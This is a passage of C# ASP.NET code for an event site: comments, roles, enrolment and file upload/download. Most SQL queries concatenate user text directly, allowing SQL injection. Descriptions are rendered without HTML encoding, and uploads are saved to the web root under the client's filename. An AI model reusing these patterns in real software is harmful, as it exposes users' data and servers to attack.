if ((PanelComentarii.FindControl(t2.ID)) == null)
{
Label l = new Label();
Label l2 = new Label();
TextBox t = new TextBox();
Button btn = new Button();
Button btn2 = new Button();
l.Text = "Autor: " + SRD.GetString(SRD.GetOrdinal("autor")).ToString();
PanelComentarii.Controls.Add(l);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l2.Text = "Data: " + SRD.GetDateTime(SRD.GetOrdinal("data")).ToString();
PanelComentarii.Controls.Add(l2);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
t.ID = "Comentariu" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
t.Text = SRD.GetString(SRD.GetOrdinal("text"));
t.Enabled = false;
t.BorderWidth = 0;
t.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFFFFF");
PanelComentarii.Controls.Add(t);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
btn.ID = "Sterge" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn.Text = "Sterge";
btn.CssClass = "btn btn-danger";
btn.Click += new EventHandler(ComentariuSterge);
if (Session["nume"] == null)
btn.Visible = false;
else if (SRD.GetString(SRD.GetOrdinal("autor")).ToString().ToUpper() != Session["nume"].ToString().ToUpper())
btn.Visible = false;
if (Proprietar || Organizator)
btn.Visible = true;
PanelComentarii.Controls.Add(btn);
btn2.ID = "Raspunde" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn2.Text = "Raspunde";
btn2.CssClass = "btn btn-warning";
btn2.ToolTip = SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
if (Session["nume"] == null)
btn2.Visible = false;
btn2.Click += new EventHandler(ComentariuRaspunde);
PanelComentarii.Controls.Add(btn2);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
if (!(Session["idtata"] == null))
if (Session["idtata"].ToString() == SRD.GetInt32(SRD.GetOrdinal("id")).ToString())
{
TextBox rsp = new TextBox();
rsp.ID = "rsp2";
rsp.Columns = 100;
rsp.MaxLength = 500;
rsp.Rows = 5;
rsp.TextMode = TextBoxMode.MultiLine;
PanelComentarii.Controls.Add(rsp);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
Button btn3 = new Button();
btn3.ID = "rsp";
btn3.Text = "Posteaza";
btn3.ToolTip = SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
btn3.Click += new EventHandler(ComentariuRaspundePosteaza);
PanelComentarii.Controls.Add(btn3);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
}
PanelForum.Controls.Add(new LiteralControl("</br>"));
sqlConnection2.Open();
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection2;
cmd5.CommandText = "select * from replici where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_parinte=" + SRD.GetInt32(SRD.GetOrdinal("id")) + " order by data desc;";
cmd5.CommandType = CommandType.Text;
//////////////////////////////////////////////////////
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
TextBox t25 = new TextBox();
t25.ID = "Comentariu" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
if ((PanelComentarii.FindControl(t25.ID)) == null)
{
Label l5 = new Label();
Label l25 = new Label();
TextBox t5 = new TextBox();
Label l255 = new Label();
Button btn5 = new Button();
l5.Style.Add("padding-left", "100px");
l25.Style.Add("padding-left", "100px");
t5.Style.Add("padding-left", "100px");
l255.Style.Add("padding-left", "100px");
l5.Text = "Autor: " + SRD5.GetString(SRD5.GetOrdinal("autor")).ToString();
PanelComentarii.Controls.Add(l5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l25.Text = "Data: " + SRD5.GetDateTime(SRD5.GetOrdinal("data")).ToString();
PanelComentarii.Controls.Add(l25);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
t5.ID = "Comentariu" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
t5.Text = SRD5.GetString(SRD5.GetOrdinal("text"));
t5.Enabled = false;
t5.BorderWidth = 0;
t5.BackColor = System.Drawing.ColorTranslator.FromHtml("#FFFFFF");
PanelComentarii.Controls.Add(t5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
l255.Text = "";
PanelComentarii.Controls.Add(l255);
btn5.ID = "Sterge" + SRD5.GetInt32(SRD5.GetOrdinal("id")).ToString();
btn5.Text = "Sterge";
if (Session["nume"] == null)
btn5.Visible = false;
if (Session["nume"] != null)
if (SRD5.GetString(SRD5.GetOrdinal("autor")).ToString().ToUpper() != Session["nume"].ToString().ToUpper())
btn5.Visible = false;
if (Organizator || Proprietar)
btn5.Visible = true;
btn5.CssClass = "btn btn-danger";
btn5.Click += new EventHandler(ComentariuSterge);
PanelComentarii.Controls.Add(btn5);
PanelComentarii.Controls.Add(new LiteralControl("</br>"));
PanelForum.Controls.Add(new LiteralControl("</br>"));
// PanelForum.Controls.Add(new LiteralControl("<p></p>"));
}
else break;
}
}
sqlConnection2.Close();
// PanelForum.Controls.Add(new LiteralControl("<p></p>"));
}
else break;
}
}
sqlConnection1.Close();
}
protected void ButtonAdaugaRol2_Click(object sender, EventArgs e)
{
LabelDenumire.Visible = true;
LabelDescriere.Visible = true;
LabelMaxUsers.Visible = true;
DenumireRol.Visible = true;
DescriereRol.Visible = true;
MaxUsers.Visible = true;
ButtonSubmitRol2.Visible = true;
ButtonAdaugaRol2.Visible = false;
div_rol.Visible = true;
}
protected void ButtonSubmitRol2_Click(object sender, EventArgs e)
{
string den = "", desc = "", max_u = "";
int max = 0;
den = DenumireRol.Text;
desc = DescriereRol.Text;
if (MaxUsers.Text != "")
{
try
{
max_u = MaxUsers.Text;
max = Convert.ToInt32(max_u);
}
            catch (Exception)
            {
                LabelEroareRol.Text = "Valoare utilizatori maximi nu este valida!";
                return;
            }
}
if (den == "" || desc == "")
{
LabelEroareRol.Text = "Campurile Denumire si Descriere sunt obligatorii!";
}
else
{
int nr = 0;
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select max(Id) as numar from roluri";
cmd.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
try
{
nr = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
                    catch (Exception)
{
nr = 0;
}
}
}
sqlConnection1.Close();
nr++;
cmd = new SqlCommand("INSERT INTO roluri(Id, id_eveniment, denumire, descriere, max_participanti) values(" + nr + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ", '" + den + "','" + desc + "', " + max + ")", sqlConnection1);
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
LabelEroareRol.Text = "Rol adaugat cu succes!";
LabelDenumire.Visible = false;
LabelDescriere.Visible = false;
LabelMaxUsers.Visible = false;
DenumireRol.Visible = false;
DescriereRol.Visible = false;
MaxUsers.Visible = false;
ButtonSubmitRol2.Visible = false;
ButtonAdaugaRol2.Visible = true;
Afiseaza_Roluri();
}
}
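    // Rebuilds the roles panel: lists each role of the selected event with its
    // description and enrolment count, and shows Inrolare/Refuza/delete buttons
    // depending on whether the visitor is enrolled, an organizer or the owner.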
private void Afiseaza_Roluri()
{
PanelRoluri.Controls.Clear();
int nr = 0, max = 0, ok = 0, rol = 0;
SqlCommand cmd3 = new SqlCommand();
cmd3.Connection = sqlConnection1;
cmd3.CommandType = CommandType.Text;
cmd3.CommandText = "select count(*) as numar from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_utilizator=" + Convert.ToInt32(Session["Id"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd3.ExecuteReader())
{
while (SRD.Read())
{
ok = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
if (ok != 0)
{
SqlCommand cmd4 = new SqlCommand();
cmd4.Connection = sqlConnection1;
cmd4.CommandType = CommandType.Text;
cmd4.CommandText = "select id_rol from participa where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " and id_utilizator=" + Convert.ToInt32(Session["Id"]);
sqlConnection1.Open();
using (SqlDataReader SRD = cmd4.ExecuteReader())
{
while (SRD.Read())
{
rol = SRD.GetInt32(SRD.GetOrdinal("id_rol"));
}
}
sqlConnection1.Close();
}
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from roluri where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelRoluri.Controls.Add(new LiteralControl("</br></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Label l1 = new Label();
l1.Text = SRD.GetString(SRD.GetOrdinal("denumire")).ToString() + " ";
PanelRoluri.Controls.Add(l1);
if (SRD.GetString(SRD.GetOrdinal("descriere")).ToString() != "")
{
Label l3 = new Label();
l3.Text = "<br />Descriere: " + SRD.GetString(SRD.GetOrdinal("descriere")).ToString() + " ";
PanelRoluri.Controls.Add(l3);
}
max = SRD.GetInt32(SRD.GetOrdinal("max_participanti"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select count(*) as numar from participa where id_rol=" + SRD.GetInt32(SRD.GetOrdinal("Id"));
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
nr = SRD2.GetInt32(SRD2.GetOrdinal("numar"));
}
}
sqlConnection2.Close();
if (Session["Nume"] != null && ok == 0 && nr < max)
{
Button Button1 = new Button();
Button1.Text = "Inrolare";
Button1.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.Click += new EventHandler(Inrolare);
Button1.CssClass = "btn btn-success";
PanelRoluri.Controls.Add(Button1);
}
else
if (Session["Nume"] != null && ok == 0 && max == 0)
{
Button Button1 = new Button();
Button1.Text = "Inrolare";
Button1.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.CssClass = "btn btn-success";
Button1.Click += new EventHandler(Inrolare);
PanelRoluri.Controls.Add(Button1);
}
if (rol == SRD.GetInt32(SRD.GetOrdinal("Id")))
{
Button Button2 = new Button();
Button2.Text = "Refuza";
Button2.CssClass = "btn btn-danger";
Button2.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button2.Click += new EventHandler(RefuzaInrolare);
PanelRoluri.Controls.Add(Button2);
}
if ((Proprietar || Organizator) && (SRD.GetString(SRD.GetOrdinal("denumire")).ToString() != "Participant") && nr == 0)
{
Button Button3 = new Button();
Button3.Text = "<NAME>";
Button3.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "a";
Button3.CssClass = "btn btn-danger";
Button3.Click += new EventHandler(StergeRol);
PanelRoluri.Controls.Add(Button3);
}
/*if (Proprietar || Organizator)
{
Button Button4 = new Button();
Button4.Text = "Participanti";
Button4.ID = SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "b";
Button4.CssClass = "btn btn-warning";
Button4.Click += new EventHandler(AfiseazaUtilizatoriRol);
PanelRoluri.Controls.Add(Button4);
}*/
if (max != 0)
{
Label l2 = new Label();
l2.Text = "<br />Deja inrolati: " + nr + "/" + max;
PanelRoluri.Controls.Add(l2);
}
else
{
Label l2 = new Label();
l2.Text = "<br />Deja inrolati: " + nr;
PanelRoluri.Controls.Add(l2);
}
PanelRoluri.Controls.Add(new LiteralControl("<br /><br />"));
}
}
PanelRoluri.Controls.Add(new LiteralControl("<br /><br />"));
sqlConnection1.Close();
}
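    // Enrols the current user in the role whose id is carried by the clicked button.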
private void Inrolare(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
id = Convert.ToInt32(x.ID);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "insert into participa(id_utilizator, id_rol, id_eveniment) values(" + Convert.ToInt32(Session["Id"]) + ", " + id + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ")";
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
}
private void RefuzaInrolare(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
id = Convert.ToInt32(x.ID);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "delete from participa where id_utilizator=" + Convert.ToInt32(Session["Id"]) + " and id_rol=" + id + " and id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
}
private void StergeRol(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
string temp = x.ID;
temp = temp.TrimEnd('a');
id = Convert.ToInt32(temp);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "delete from roluri where Id=" + id;
sqlConnection1.Open();
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Roluri();
LabelEroareRol.Text = "Rol sters cu succes!";
}
/*private void AfiseazaUtilizatoriRol(object sender, EventArgs e)
{
PanelParticipanti.Visible = true;
PanelParticipanti.Controls.Clear();
Button x = (Button)sender;
int id = 0, id_util = 0;
string temp = x.ID;
temp = temp.TrimEnd('b');
id = Convert.ToInt32(temp);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from participa where id_rol=" + id;
sqlConnection1.Open();
PanelParticipanti.Controls.Add(new LiteralControl("<div class='panel panel-success' style='max-width:40%'><div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
id_util = SRD.GetInt32(SRD.GetOrdinal("id_utilizator"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select id, acont from utilizator where id=" + id_util;
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
Label l1 = new Label();
l1.Text =SRD2.GetString(SRD2.GetOrdinal("acont")).ToString() + " ";
PanelParticipanti.Controls.Add(l1);
Button Button5 = new Button();
Button5.Text = "Elimina";
Button5.ID = SRD2.GetInt32(SRD2.GetOrdinal("id")).ToString() + "c";
Button5.Click += new EventHandler(EliminaParticipant);
Button5.CssClass = "btn btn-danger";
PanelParticipanti.Controls.Add(Button5);
PanelParticipanti.Controls.Add(new LiteralControl("</br></br>"));
}
}
sqlConnection2.Close();
}
}
PanelParticipanti.Controls.Add(new LiteralControl("</div></div>"));
Button Button2 = new Button();
Button2.Text = "Ascunde";
Button2.Click += new EventHandler(AscundeParticipanti);
Button2.CssClass = "btn btn-success";
PanelParticipanti.Controls.Add(Button2);
LabelEroareRol.Text = "weird";
sqlConnection1.Close();
}*/
private void EliminaParticipant(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0;
string temp = x.ID;
temp = temp.TrimEnd('c');
id = Convert.ToInt32(temp);
SqlCommand cmd7 = new SqlCommand();
cmd7.Connection = sqlConnection1;
cmd7.CommandType = CommandType.Text;
cmd7.CommandText = "delete from participa where id_utilizator=" + id + " and id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
cmd7.ExecuteNonQuery();
sqlConnection1.Close();
AfiseazaParticipanti();
Afiseaza_Roluri();
}
private void AscundeParticipanti(object sender, EventArgs e)
{
PanelParticipanti.Controls.Clear();
PanelParticipanti.Visible = false;
}
private void ButtonAfiseazaParticipanti_Click(object sender, EventArgs e)
{
PanelParticipanti.Visible = true;
}
protected void AfiseazaParticipanti()
{
int id_util = 0;
PanelParticipanti.Controls.Clear();
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from participa where id_eveniment =" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelParticipanti.Controls.Add(new LiteralControl("<div class='panel panel-success' style='max-width:40%'><div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
id_util = SRD.GetInt32(SRD.GetOrdinal("id_utilizator"));
sqlConnection2.Open();
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection2;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "select id, acont from utilizator where id=" + id_util;
using (SqlDataReader SRD2 = cmd2.ExecuteReader())
{
while (SRD2.Read())
{
Label l1 = new Label();
l1.Text = SRD2.GetString(SRD2.GetOrdinal("acont")).ToString() + " ";
PanelParticipanti.Controls.Add(l1);
if (Proprietar || Organizator)
{
Button Button5 = new Button();
Button5.Text = "Elimina";
Button5.ID = SRD2.GetInt32(SRD2.GetOrdinal("id")).ToString() + "c";
Button5.Click += new EventHandler(EliminaParticipant);
Button5.CssClass = "btn btn-danger";
PanelParticipanti.Controls.Add(Button5);
}
PanelParticipanti.Controls.Add(new LiteralControl("</br></br>"));
}
}
sqlConnection2.Close();
}
}
PanelParticipanti.Controls.Add(new LiteralControl("</div></div>"));
Button Button2 = new Button();
Button2.Text = "Ascunde";
Button2.Click += new EventHandler(AscundeParticipanti);
Button2.CssClass = "btn btn-success";
PanelParticipanti.Controls.Add(Button2);
sqlConnection1.Close();
}
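// NOTE (illustrative sketch): AfiseazaParticipanti runs one utilizator query per
// participant over a second connection. A single JOIN returns the same account names
// in one round trip; the helper below assumes the participa/utilizator schema used above.
private void AfiseazaParticipantiJoin()
{
SqlCommand cmd = new SqlCommand(
"select u.id, u.acont from participa p join utilizator u on u.id = p.id_utilizator where p.id_eveniment = @ev",
sqlConnection1);
cmd.Parameters.AddWithValue("@ev", Convert.ToInt32(Session["IdEvenimentSelectat"]));
sqlConnection1.Open();
using (SqlDataReader rd = cmd.ExecuteReader())
{
while (rd.Read())
{
Label l1 = new Label();
l1.Text = rd.GetString(rd.GetOrdinal("acont")) + " ";
PanelParticipanti.Controls.Add(l1);
}
}
sqlConnection1.Close();
}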
private void Afiseaza_Fisiere()
{
PanelShow.Controls.Clear();
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from documente where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]);
sqlConnection1.Open();
PanelShow.Controls.Add(new LiteralControl("</br><div class='panel panel-info'> <div class='panel-heading'></br>"));
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
Label l1 = new Label();
l1.Text = "Fisier: " + SRD.GetString(SRD.GetOrdinal("document")).ToString() + " ";
PanelShow.Controls.Add(l1);
Label l2 = new Label();
l2.Text = "Data: " + SRD.GetString(SRD.GetOrdinal("data_incarcare")).ToString() + " ";
PanelShow.Controls.Add(l2);
if (Proprietar || Organizator)
{
Button Button1 = new Button();
Button1.Text = "Delete";
Button1.CssClass = "btn btn-danger";
Button1.ID = "delete_" + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button1.Click += new EventHandler(DeleteFisier);
PanelShow.Controls.Add(Button1);
}
Button Button2 = new Button();
Button2.Text = "Download";
Button2.ID = "download_" + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString();
Button2.CssClass = "btn btn-success";
Button2.Click += new EventHandler(DownloadFisier);
PanelShow.Controls.Add(Button2);
PanelShow.Controls.Add(new LiteralControl("</br>"));
}
}
PanelShow.Controls.Add(new LiteralControl("</br></div></div></br>"));
sqlConnection1.Close();
}
private void DeleteFisier(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0; string nume = "";
id = Convert.ToInt32(x.ID.Substring(7));
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where Id=" + id;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
}
}
sqlConnection1.Close();
File.Delete(Server.MapPath(nume));
SqlCommand cmd2 = new SqlCommand();
cmd2.Connection = sqlConnection1;
cmd2.CommandType = CommandType.Text;
cmd2.CommandText = "delete from documente where Id=" + id;
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
Afiseaza_Fisiere();
lblInfo.Text = "Fisier sters cu succes!";
}
private void DownloadFisier(object sender, EventArgs e)
{
Button x = (Button)sender;
int id = 0; string nume = "";
id = Convert.ToInt32(x.ID.Substring(9));
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select document from documente where Id=" + id;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
nume = SRD.GetString(SRD.GetOrdinal("document")).ToString();
}
}
sqlConnection1.Close();
if (nume.Contains(".htm") || nume.Contains(".html"))
{
Response.ContentType = "text/HTML";
}
if (nume.Contains(".txt"))
{
Response.ContentType = "text/plain";
}
if (nume.Contains(".doc") || nume.Contains(".rtf") || nume.Contains(".docx"))
{
Response.ContentType = "Application/msword";
}
if (nume.Contains(".xls") || nume.Contains(".xlsx"))
{
Response.ContentType = "Application/x-msexcel";
}
if (nume.Contains(".jpg") || nume.Contains(".jpeg"))
{
Response.ContentType = "image/jpeg";
}
if (nume.Contains(".gif"))
{
Response.ContentType = "image/GIF";
}
if (nume.Contains(".pdf"))
{
Response.ContentType = "application/pdf";
}
Response.AppendHeader("Content-Disposition", "attachment; filename="+nume+"");
Response.TransmitFile(Server.MapPath(nume));
Response.End();
}
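// NOTE (illustrative sketch): the Contains() chain above keys off substrings, so a name
// like "raport.pdf.exe" would be served as a PDF, and unknown extensions leave
// ContentType unset. A lookup keyed on Path.GetExtension is tighter; the table below is
// an assumption, not an exhaustive list. Requires System.Collections.Generic.
private static readonly Dictionary<string, string> MimePeExtensie =
new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase)
{
{ ".htm", "text/html" }, { ".html", "text/html" },
{ ".txt", "text/plain" },
{ ".doc", "application/msword" }, { ".rtf", "application/msword" }, { ".docx", "application/msword" },
{ ".xls", "application/x-msexcel" }, { ".xlsx", "application/x-msexcel" },
{ ".jpg", "image/jpeg" }, { ".jpeg", "image/jpeg" },
{ ".gif", "image/gif" },
{ ".pdf", "application/pdf" }
};
private static string ContentTypePentru(string nume)
{
string mime;
// Fall back to a generic binary type instead of leaving the header unset.
return MimePeExtensie.TryGetValue(Path.GetExtension(nume), out mime)
? mime
: "application/octet-stream";
}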
private void cmdSend_Click(object sender, System.EventArgs e)
{
int ok = 0;
if (filMyFile.PostedFile != null)
{
HttpPostedFile myFile = filMyFile.PostedFile;
int nFileLen = myFile.ContentLength;
if (nFileLen > 0)
{
byte[] myData = new byte[nFileLen];
string dt = DateTime.Now.ToString("d"); ;
myFile.InputStream.Read(myData, 0, nFileLen);
string strFilename = Path.GetFileName(myFile.FileName);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select count(*) as numar from documente where document='" + strFilename + "'";
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
ok = SRD.GetInt32(SRD.GetOrdinal("numar"));
}
}
sqlConnection1.Close();
if (ok == 0)
{
WriteToFile(Server.MapPath(strFilename), ref myData);
UpdateDatabaseDoc(strFilename, dt);
lblInfo.Text =
"Filename: " + strFilename + "<br>" +
"Date: " + dt + "<br> Fisier uploadat cu succes!<p>";
Afiseaza_Fisiere();
}
else
{
lblInfo.Text = "Fisier deja existent!";
}
}
}
}
private void UpdateDatabaseDoc(string Name, string date)
{
int nr = 0;
SqlCommand cmd5 = new SqlCommand();
cmd5.Connection = sqlConnection1;
cmd5.CommandText = "select max(Id) as numar from documente";
cmd5.CommandType = CommandType.Text;
sqlConnection1.Open();
using (SqlDataReader SRD5 = cmd5.ExecuteReader())
{
while (SRD5.Read())
{
try { nr = SRD5.GetInt32(SRD5.GetOrdinal("numar")); }
catch { nr = 0; } // max(Id) is NULL when the table is empty
}
}
sqlConnection1.Close();
nr++;
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd = new SqlCommand("INSERT INTO documente(Id, id_eveniment, document, data_incarcare) VALUES(" + nr + ", " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ", '" + Name + "', '" + date + "')", sqlConnection1);
cmd.ExecuteNonQuery();
sqlConnection1.Close();
}
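// NOTE (illustrative sketch): UpdateDatabaseDoc computes max(Id)+1 on the client, so two
// simultaneous uploads can collide on the same Id. If documente.Id were declared IDENTITY
// (an assumption about the schema), the insert could omit it and read the generated key
// back with SCOPE_IDENTITY():
private int InsereazaDocument(string nume, string data)
{
SqlCommand cmd = new SqlCommand(
"insert into documente(id_eveniment, document, data_incarcare) values(@ev, @doc, @data); select cast(scope_identity() as int);",
sqlConnection1);
cmd.Parameters.AddWithValue("@ev", Convert.ToInt32(Session["IdEvenimentSelectat"]));
cmd.Parameters.AddWithValue("@doc", nume);
cmd.Parameters.AddWithValue("@data", data);
sqlConnection1.Open();
int idNou = (int)cmd.ExecuteScalar(); // the SELECT returns the key just generated
sqlConnection1.Close();
return idNou;
}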
private void WriteToFile(string strPath, ref byte[] Buffer)
{
FileStream newFile = new FileStream(strPath, FileMode.Create);
newFile.Write(Buffer, 0, Buffer.Length);
newFile.Close();
}
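// NOTE (illustrative sketch): WriteToFile leaks the FileStream handle if Write throws.
// File.WriteAllBytes performs the same create/write/close and disposes the stream even
// on failure:
private void WriteToFileSafe(string strPath, byte[] buffer)
{
File.WriteAllBytes(strPath, buffer);
}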
private string GetMyName()
{
string strScript = Request.ServerVariables["SCRIPT_NAME"];
int nPos = strScript.LastIndexOf("/");
if (nPos > -1)
strScript = strScript.Substring(nPos + 1);
return strScript;
}
protected void ButtonComentariu_Click(object sender, EventArgs e)
{
PanelComentariuNou.Visible = true;
ButtonForum_Click(sender, e);
}
protected void ButtonScrieComentariu_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
string text = TextBoxComentariuNou.Text, autor = Session["nume"].ToString();
cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor) VALUES (" + idev + ",'" + text + "','" + autor + "');";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ComentariuSterge(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
int id = Convert.ToInt32(btn.ID.Substring(6));
cmd.CommandText = "DELETE FROM replici WHERE id=" + id + ";";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ComentariuRaspunde(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
// sqlConnection1.Open();
// cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
// string text = TextBoxComentariuNou.Text, autor = Session["nume"].ToString();
// cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor,id_parinte) VALUES (" + idev + ",'" + text + "','" + autor + "',"+Convert.ToInt32(btn.ToolTip)+");";
// cmd.CommandType = CommandType.Text;
// cmd.ExecuteNonQuery();
Session["idtata"] = btn.ID.ToString().Substring(8);
// sqlConnection1.Close();
PanelComentariuNou.Visible = false;
Page_Load(sender, e);
}
protected void ComentariuRaspundePosteaza(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
Button btn = (Button)sender;
TextBox t = (TextBox)PanelComentarii.FindControl("rsp2");
int idev = Convert.ToInt32(Session["IdEvenimentSelectat"]);
string text = t.Text;
string autor = Session["nume"].ToString();
cmd.CommandText = "INSERT INTO replici (id_eveniment,text,autor,id_parinte) VALUES (" + idev + ",'" + text + "','" + autor + "'," + Convert.ToInt32(btn.ToolTip) + ");";
cmd.CommandType = CommandType.Text;
cmd.ExecuteNonQuery();
Session["idtata"] = null;
sqlConnection1.Close();
PanelComentariuNou.Visible = false;
ButtonForum_Click(sender, e);
}
protected void ButtonAdaugaRol2_Click1(object sender, EventArgs e)
{
}
protected void Button_EvenimenteFeatured_Click(object sender, EventArgs e)
{
Response.Redirect("EvenimenteFeatured.aspx");
}
protected void Afiseaza_NumarParticipanti()
{
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
try
{
sqlConnection1.Open();
cmd.CommandText = "select count(id_utilizator) from participa where id_eveniment = " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
nr_part.Text = cmd.ExecuteScalar().ToString();
sqlConnection1.Close();
}
catch (Exception ex)
{
MesajRaspuns.Text = " eroare in functia de afisare participanti "+ex.Message;
}
}
//protected void ButtonEditeazaLocatie_Click(object sender, EventArgs e)
//{
// textbox_latitudine.Visible = true;
// textbox_longitudine.Visible = true;
// ButtonIntroduceDateLocatie.Visible = true;
// ButtonLocatie.Visible = false;
// SqlCommand cmd = new SqlCommand();
// try
// {
// sqlConnection1.Open();
// cmd.Connection = sqlConnection1;
